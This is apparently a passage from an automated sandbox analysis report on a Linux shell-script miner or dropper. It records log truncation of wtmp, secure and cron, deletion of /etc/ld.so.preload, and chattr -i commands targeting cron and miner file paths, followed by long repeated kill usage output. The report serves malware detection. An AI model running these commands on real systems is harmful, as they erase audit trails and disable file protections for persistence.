<pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1)./tmp/pcXrXrdEB2: line 121: rep: command not foundgrep: write errorUsage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).chattr: No such file or directory while trying to stat /usr/local/bin/dnschattr: No such file or directory while trying to stat /etc/cron.d/rootchattr: No such file or directory while trying to stat /etc/cron.d/apachechattr: No such file or directory while trying to stat /var/spool/cron/rootchattr: No such file or directory while trying to stat /var/spool/cron/crontabs/rootchattr: No such file or directory while trying to stat /etc/ld.so.preload: exit code = 0

Hooking and other Techniques for Hiding and Protection:

barindex
Drops files with innocent-looking namesShow sources
Source: /bin/bash (PID: 9334)Path: /etc/cron.d/apacheJump to dropped file

Malware Analysis System Evasion:

barindex
Deletes security-related log filesShow sources
Source: /bin/bash (PID: 9334)Truncated file: /var/log/wtmp
Source: /bin/bash (PID: 9334)Truncated file: /var/log/secure
Source: /bin/bash (PID: 9334)Truncated file: /var/log/cron
Deletes log filesShow sources
Source: /bin/bash (PID: 9334)Truncated file: /var/log/wtmp
Source: /bin/bash (PID: 9334)Truncated file: /var/log/secure
Source: /bin/bash (PID: 9334)Truncated file: /var/log/cron
Executes the "sleep" command used to delay execution and potentially evade sandboxesShow sources
Source: /bin/bash (PID: 13010)Sleep executable: /bin/sleep -> sleep 5
Reads CPU information from /sys indicative of miner or evasive malwareShow sources
Source: /bin/pkill (PID: 9338)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9350)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9411)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9419)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9431)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9454)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9463)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9482)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9490)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9502)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9527)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9546)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9571)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9578)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9585)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9604)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9630)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9654)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9660)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9671)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9677)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9704)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9711)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9723)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9732)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9739)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9754)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9779)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9794)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9808)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9817)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9832)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9837)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9845)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9852)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9871)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9882)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9903)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9923)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9930)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9937)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9944)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9962)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9969)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9979)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9992)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10000)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10017)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10030)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10044)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10051)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10063)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10071)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10090)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10108)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10126)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10133)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10144)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10153)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10160)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10167)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10175)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10194)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10202)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10221)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /tmp/r1x (PID: 13009)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/lib/polkit-1/polkitd (PID: 9953)Reads CPU info from /sys: /sys/devices/system/cpu/online
Uses the "uname" system call to query kernel version information (possible evasion)Show sources
Source: /bin/bash (PID: 9334)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9338)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9350)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9411)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9419)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9431)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9454)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9463)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9482)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9490)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9502)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9527)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9546)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9571)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9578)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9585)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9604)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9630)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9654)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9660)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9671)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9677)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9704)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9711)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9723)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9732)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9739)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9754)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9779)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9794)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9808)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9817)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9832)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9837)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9845)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9852)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9871)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9882)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9903)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9923)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9930)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9937)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9944)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9962)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9969)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9979)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9992)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10000)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10017)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10030)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10044)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10051)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10063)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10071)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10090)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10108)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10126)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10133)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10144)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10153)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10160)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10167)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10175)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10194)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10202)Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10221)Queries kernel information via 'uname':
Source: /bin/ps (PID: 10417)Queries kernel information via 'uname':
Source: /bin/ps (PID: 10464)Queries kernel information via 'uname':
Source: /bin/ps (PID: 10498)Queries kernel information via 'uname':
Source: /bin/ps (PID: 10541)Queries kernel information via 'uname':
Source: /bin/ps (PID: 10577)Queries kernel information via 'uname':
Source: /bin/ps (PID: 10614)Queries kernel information via 'uname':
Source: /bin/ps (PID: 10649)Queries kernel information via 'uname':
Source: /bin/ps (PID: 10675)Queries kernel information via 'uname':
Source: /bin/ps (PID: 10712)Queries kernel information via 'uname':
Source: /bin/ps (PID: 10742)Queries kernel information via 'uname':
Source: /bin/ps (PID: 10773)Queries kernel information via 'uname':
Source: /bin/ps (PID: 10808)Queries kernel information via 'uname':
Source: /bin/ps (PID: 10839)Queries kernel information via 'uname':
Source: /bin/ps (PID: 10870)Queries kernel information via 'uname':
Source: /bin/ps (PID: 10906)Queries kernel information via 'uname':
Source: /bin/ps (PID: 10944)Queries kernel information via 'uname':
Source: /bin/ps (PID: 10980)Queries kernel information via 'uname':
Source: /bin/ps (PID: 11016)Queries kernel information via 'uname':
Source: /bin/ps (PID: 11046)Queries kernel information via 'uname':
Source: /bin/ps (PID: 11079)Queries kernel information via 'uname':
Source: /bin/ps (PID: 11119)Queries kernel information via 'uname':
Source: /bin/curl (PID: 11804)Queries kernel information via 'uname':
Source: /bin/curl (PID: 12198)Queries kernel information via 'uname':
Source: /bin/curl (PID: 12403)Queries kernel information via 'uname':
Source: /bin/curl (PID: 12542)Queries kernel information via 'uname':
Source: /bin/ps (PID: 12711)Queries kernel information via 'uname':
Source: /bin/ps (PID: 12721)Queries kernel information via 'uname':
Source: /bin/curl (PID: 12765)Queries kernel information via 'uname':
Source: /tmp/r1x (PID: 13009)Queries kernel information via 'uname':

HIPS / PFW / Operating System Protection Evasion:

barindex
Deletes /etc/ld.so.preload (likely AV evasion)Show sources
Source: /bin/rm (PID: 12695)Deletion: /etc/ld.so.preload

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Removes protection from filesShow sources
Source: /bin/bash (PID: 10318)Args: chattr -i /tmp/kworkerds /var/tmp/kworkerds /var/tmp/config.json /tmp/.systemd-private-*
Source: /bin/bash (PID: 10338)Args: chattr -i /usr/lib/libiacpkmn.so.3
Source: /bin/bash (PID: 10346)Args: chattr -i /etc/init.d/nfstruncate
Source: /bin/bash (PID: 10353)Args: chattr -i /bin/nfstruncate
Source: /bin/bash (PID: 10367)Args: chattr -i /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc*.d/S01acpidtd /etc/rc*.d/S01acpidtd /etc/ld.sc.conf
Source: /bin/bash (PID: 11780)Args: chattr -i /usr/local/bin/dns /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ld.so.preload


Runtime Messages

Command:bash "/tmp/pcXrXrdEB2"
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:chattr: No such file or directory while trying to stat /tmp/kworkerds
chattr: No such file or directory while trying to stat /var/tmp/kworkerds
chattr: No such file or directory while trying to stat /var/tmp/config.json
chattr: No such file or directory while trying to stat /tmp/.systemd-private-*
chattr: No such file or directory while trying to stat /usr/lib/libiacpkmn.so.3
chattr: No such file or directory while trying to stat /etc/init.d/nfstruncate
chattr: No such file or directory while trying to stat /bin/nfstruncate
chattr: No such file or directory while trying to stat /bin/ddus-uidgen
chattr: No such file or directory while trying to stat /etc/init.d/acpidtd
chattr: No such file or directory while trying to stat /etc/rc.d/rc*.d/S01acpidtd
chattr: No such file or directory while trying to stat /etc/rc*.d/S01acpidtd
chattr: No such file or directory while trying to stat /etc/ld.sc.conf

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
